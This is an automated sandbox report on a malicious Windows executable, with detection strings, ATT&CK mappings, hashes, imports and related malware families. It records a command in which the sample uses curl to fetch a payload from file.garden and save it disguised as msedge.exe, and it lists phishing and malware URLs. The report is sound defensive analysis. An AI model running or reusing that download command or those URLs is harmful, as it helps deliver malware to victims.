Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\4sTTCruY06.exe

0_2_00007FF69DCD1230

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DCE0710 QueryPerformanceFrequency,QueryPerformanceCounter,malloc,LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_00007FF69DCE0710

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DD1D328 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00007FF69DD1D328

Source: C:\Users\user\Desktop\4sTTCruY06.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\4sTTCruY06.exe

Code function: 0_2_00007FF69DD1DCD0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF69DD1DCD0

Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	21 Input Capture	1 System Time Discovery	Remote Services	21 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4sTTCruY06.exe	21%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
file.garden	188.114.96.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.dr	false		unknown
http://upx.sf.net	Amcache.hve.0.dr	false	URL Reputation: safe	unknown
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binlrc	curl.exe, 00000003.00000002.2090175602.0000022B46EA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.cloudflare.com/5xx-error-landing	curl.exe, 00000003.00000003.2089781752.0000022B46F05000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089724979.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089833939.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089781752.0000022B46F1E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2089881481.0000022B46EC0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe.3.dr	false		unknown
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:	curl.exe, 00000003.00000002.2090175602.0000022B46EA0000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	file.garden	European Union		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522833
Start date and time:	2024-09-30 18:30:01 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4sTTCruY06.exe renamed because original name is a hash value
Original Sample Name:	38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824.exe
Detection:	MAL
Classification:	mal64.phis.winEXE@7/3@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 4sTTCruY06.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
file.garden	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
file.garden	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://serrespec.weebly.com/tc2000-stock-charting-software.html	Get hash	malicious	Unknown	Browse	104.22.52.71
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	172.67.148.87

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	Cr4745ElZg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	188.114.96.3
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ha9wYxkNI7.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	9KO1ScZ376.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	U4hM4c3l4m.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	f1w58Se3jL.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3

Process:	C:\Windows\System32\curl.exe
File Type:	HTML document, ASCII text, with very long lines (394)
Category:	dropped
Size (bytes):	4420
Entropy (8bit):	5.0991852558769555
Encrypted:	false
SSDEEP:	96:1j9jwIjYjUDK/D5DMF+BOisvEA2ZLimJrR49PaQxJbGD:1j9jhjYjIK/Vo+tsgZOmJrO9ieJGD
MD5:	CC35EC5D3A4A4C996DB52DE380451B12
SHA1:	3EB83AD83288B6B93993481B368947274896300A
SHA-256:	4E9EF918E74416C4D4C14AFA3B44FA27EA74169CE9F3473B0B075DB277BEBBA3
SHA-512:	3A006C807E8B46F1479F449091964CF42A4C8BFBFA85A1F801FFAD8D9FF50FBF1FCF9DFDF376BD4D115188DBEF54A73A391911994655AA543100D2ACBF480320
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Windows\Speech\msedge.exe, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\4sTTCruY06.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.418957380076598
Encrypted:	false
SSDEEP:	6144:1Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:8vloTMW+EZMM6DFyn03w
MD5:	273FD69CDD01C4B4F7DF41DEE0D542D5
SHA1:	A84F164159A633AFF76E85C844E17067932F44E9
SHA-256:	2F4782C7956A1C0DA1B71BDC02475EE038E8FAB6368536560FD9F721D75B03F9
SHA-512:	0DF0B54A6160604F989C5062C55B71F019B5ED6F70718CEB34B230EBFF2C84A846D8C97D3C91D06369ED779EDABD68516233C1A2F20BE828B680E49AF41DC711
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....V.................................................................................................................................................................................................................................................................................................................................................+........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\4sTTCruY06.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.260933985216441
Encrypted:	false
SSDEEP:	3:lQe9GXs9ZA0Ysys:lG8ZA09
MD5:	F7960A2BD35F4A3D46E9A024EA0D6BED
SHA1:	87475F7A5771DDC0FC310564F7B02D11A28D39EC
SHA-256:	28220B078254224B32254F1AFA92890C4A2609E0503AA8E60107ACC59047A299
SHA-512:	F6FE84FB9659536BE4DD6F5977760E1C01CAD666A4FB53C17476922DD489D5B6C57A1E357CF57E8F0FE2B1FC6F30679CC818D748D63966A2C0A8286DDEBCE0A6
Malicious:	false
Reputation:	low
Preview:	(!) failed to establish a connection with the kernel module.....

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.582012244110496
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4sTTCruY06.exe
File size:	403'456 bytes
MD5:	5a4bbfbb9e1269cbc36a6371d77acbfc
SHA1:	807a3b64b0ce44a80e3c7e347b5a02372e28892e
SHA256:	38c2636423b5916077207678dd1adbc782d863342e75fdcaabad162d8f8e2824
SHA512:	9ade757c461baa3557dcfbcbd12f3b27d88c840dde868ac72a2fd42bcee28b3f5a824f2f5ca87b352292765643d90521c1fc3ffedf7f20e7fee6ecaad5602590
SSDEEP:	6144:pC2WnIqpPtmfI4+wFhkEVqgIKDqXbI6spwyuw8uLn6xTY:wGWXqguLn
TLSH:	1484AE85E1A504E5D4ABB07881BBB20BF635345C0B104ADB73EC45942FA37E47FBAB52
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.b......................6.......6.......6.......6..............u3..............M7......M7......M7......M7......Rich...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004d704
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E95D35 [Tue Sep 17 10:43:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	053b3e9d25d46ca0200404421430cbce

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5E90D23268h
dec eax
add esp, 28h
jmp 00007F5E90D22B17h
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F5E90D22CB2h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F5E90D22CB5h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F5E90D22CADh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F5E90D22442h
int3
dec eax
and dword ptr [ecx+10h], 00000000h
dec eax
lea eax, dword ptr [000030F0h]
dec eax
mov dword ptr [ecx+08h], eax
dec eax
lea eax, dword ptr [000030D5h]
dec eax
mov dword ptr [ecx], eax
dec eax
mov eax, ecx
ret
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F5E90D22C77h
dec eax
lea edx, dword ptr [00010617h]
dec eax
lea ecx, dword ptr [eax+eax+00h]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5e004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x61000	0x30c0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x67000	0x390	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x581e0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x58280	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x580a0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x50000	0x638	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ea53	0x4ec00	4fb1d312f855943b3a3170d577715158	False	0.5324032738095238	data	6.501359649610373	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x50000	0xf810	0xfa00	71f59c19a44e159ed0427039ffe665a5	False	0.5193125	data	6.1031968650352875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x60000	0xbf0	0x400	49ce7e618d2f855b7b90357827ec0019	False	0.2919921875	DOS executable (block device driver)	3.2889610627375783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x61000	0x30c0	0x3200	fea69b7fe8aae2e13bbb7b9369af0465	False	0.462265625	data	5.700380768504395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x65000	0x1d0	0x200	90c1a4c095bdcd0bd7c466f09ff97faa	False	0.37890625	data	4.523192804901079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x66000	0x1e8	0x200	244e0e52b6cfc88b8356969084fb3b61	False	0.5390625	data	4.768131151703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x67000	0x390	0x400	1a4d7d7192e5ceb60f8ab9a335dac936	False	0.59765625	data	5.045093521487934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x66060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, QueryPerformanceFrequency, GetProcAddress, QueryPerformanceCounter, GlobalAlloc, GlobalFree, GlobalLock, WideCharToMultiByte, GlobalUnlock, GetLocaleInfoEx, FormatMessageA, LocalFree, GetCurrentThreadId, SleepConditionVariableSRW, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, CreateThread, Sleep, CreateFileW, FindClose, FindFirstFileW, FreeLibrary, GetCurrentThread, GetFileAttributesExW, AreFileApisANSI, GetLastError, GetModuleHandleW, GetFileInformationByHandleEx, WakeAllConditionVariable, GetCurrentProcessId, CloseHandle, Process32FirstW, CreateFileA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetSystemTimeAsFileTime, InitializeSListHead, MultiByteToWideChar, Process32NextW, CreateToolhelp32Snapshot, GetModuleHandleA, SetThreadPriority
USER32.dll	UpdateWindow, RegisterClassExA, SetWindowLongW, LoadCursorW, LoadIconW, TranslateMessage, SetLayeredWindowAttributes, GetAsyncKeyState, DefWindowProcA, PeekMessageW, DispatchMessageW, ShowWindow, SetWindowPos, SetCursorPos, GetCursorPos, CreateWindowExA, GetClientRect, SetCursor, GetForegroundWindow, ClientToScreen, ScreenToClient, GetKeyState, SetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, GetSystemMetrics, MessageBoxA, OpenClipboard
d3d11.dll	D3D11CreateDeviceAndSwapChain
MSVCP140.dll	?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAHXZ, ?good@ios_base@std@@QEBA_NXZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, _Query_perf_frequency, _Query_perf_counter, ?_Winerror_map@std@@YAHH@Z, ?_Syserror_map@std@@YAPEBDH@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_J@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z, ?_Xlength_error@std@@YAXPEBD@Z, _Thrd_detach, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ
D3DCOMPILER_47.dll	D3DCompile
dwmapi.dll	DwmExtendFrameIntoClientArea
IMM32.dll	ImmGetContext, ImmReleaseContext, ImmSetCandidateWindow, ImmSetCompositionWindow
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__C_specific_handler, _CxxThrowException, __current_exception, __current_exception_context, memset, memmove, memcpy, memcmp, memchr, strstr, __std_terminate, __std_exception_copy, __std_exception_destroy
api-ms-win-crt-heap-l1-1-0.dll	malloc, _callnewh, free, _set_new_mode
api-ms-win-crt-runtime-l1-1-0.dll	_invalid_parameter_noinfo_noreturn, system, _beginthreadex, terminate, abort, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _configure_narrow_argv, _exit, exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment
api-ms-win-crt-utility-l1-1-0.dll	qsort, srand, rand
api-ms-win-crt-time-l1-1-0.dll	_time64
api-ms-win-crt-string-l1-1-0.dll	strncmp, strcmp, strncpy, strcpy_s
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _set_fmode, __acrt_iob_func, fflush, fclose, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite, fseek, __stdio_common_vfprintf, ftell
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale, ___lc_codepage_func
api-ms-win-crt-math-l1-1-0.dll	atan2, atanf, acosf, cosf, asin, fmodf, __setusermatherr, powf, ceilf, sinf, sqrtf, tan
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
